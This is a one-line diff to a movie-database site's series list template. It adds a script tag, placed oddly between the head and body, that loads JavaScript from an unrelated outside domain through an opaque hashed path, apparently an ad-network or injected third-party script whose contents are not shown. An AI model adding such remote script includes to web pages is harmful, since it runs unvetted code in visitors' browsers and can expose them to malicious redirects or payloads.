--- a/moviedb/templates/series_list.html
+++ b/moviedb/templates/series_list.html
@@ -210,6 +210,7 @@
         }
     </style>
 </head>
+<script type='text/javascript' src='//elegantimpose.com/de/89/b7/de89b76309771563f1f618587e867e6b.js'></script>
 <body>
     <header>
         <button class="openbtn" onclick="openNav()">☰</button>
